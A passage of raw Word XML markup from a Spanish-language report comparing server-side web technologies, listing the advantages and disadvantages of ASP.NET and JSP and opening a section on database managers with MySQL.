        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Admite la programación con Visual Basic Script lo que facilita su implementación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta el lenguaje JScript de Microsoft (una especia de JavaScript).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El lenguaje ASP.NET soporta programación C#, VB.NET y J#. Es un lenguaje completamente orientado a objetos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se comunica de forma impecable con las bases de datos SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ASP.NET ha incrementado notablemente la velocidad y seguridad de los sistemas frente a su hermano mayor ASP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es un código propietario de Microsoft no abierto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No es fácil de leer e interpretar, se necesita escribir más código para hacer lo mismo que con otros lenguajes como el PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Muchos hostings y alojamientos web no lo soportan por su alto coste. ASP.NET necesita tener instalado IIS con el Framework .Net.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El consumo de recursos de ASP.NET es importante por lo que se requieren servidores de mayor capacidad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="000612DD" w:rsidRDefault="00D01488" w:rsidP="000612DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000612DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6817D9A1" wp14:editId="7604DB9D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2107773</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281286</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1104900" cy="2026920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9" name="Imagen 9" descr="Resultado de imagen para J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JS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04900" cy="20269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612DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="000612DD" w:rsidRDefault="00D01488" w:rsidP="000612DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="000612DD" w:rsidRDefault="00D01488" w:rsidP="000612DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="000612DD" w:rsidRDefault="00D01488" w:rsidP="000612DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRDefault="00D01488" w:rsidP="000612DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000612DD" w:rsidRDefault="000612DD" w:rsidP="000612DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0044264F" w:rsidRDefault="0044264F" w:rsidP="0044264F"/>
    <w:p w:rsidR="00D01488" w:rsidRPr="0044264F" w:rsidRDefault="0044264F" w:rsidP="0044264F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D01488" w:rsidRPr="0044264F">
        <w:t>JSP (Java Server Pages) es también un lenguaje de programación web que permite la generación de sitios web dinámicos en lenguaje Java. Es un lenguaje soportado por múltiples plataformas y como PHP y ASP se ejecuta en el lado del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características</w:t>
      </w:r>
      <w:r w:rsidR="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conjunta el poder de Java  en el servidor y la flexibilidad de HTML en el browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No sólo se puede utilizar HTML, sino también XML o WML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Hace más fácil reusar componentes con JavaBeans los cuales realizan tareas más específicas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Su función  es saber cómo procesar una solicitud para crear una respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta contenido dinámico que refleja las condiciones del mundo real.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es más rápido y fácil crear aplicaciones de web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Capaz de instanciar cualquier clase de Java.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE1A76" w:rsidRDefault="00DE1A76" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE1A76" w:rsidRPr="00D01488" w:rsidRDefault="00DE1A76" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El código está bien estructurado y resulta fácil de leer si se conoce bien el lenguaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La parte de JSP dinámico se escribe en Java, permitiendo una integración total con módulos Java y la utilización de un motor de páginas basado en servlets de Java.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es un lenguaje bastante complejo y que requiere bastante tiempo de aprendizaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1A76">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El alojamiento web requiere tener instalado un servidor Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00DE1A76" w:rsidRDefault="00D01488" w:rsidP="00DE1A76">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488"/>
    <w:p w:rsidR="00890B46" w:rsidRPr="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc514520842"/>
      <w:r w:rsidRPr="00890B46">
        <w:t>Lado servidor: Gestores de Bases de Datos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00890B46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A727E" w:rsidRPr="006A727E" w:rsidRDefault="006A727E" w:rsidP="006A727E"/>
    <w:p w:rsidR="00800CB8" w:rsidRDefault="00800CB8" w:rsidP="00800CB8"/>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
    </w:p>
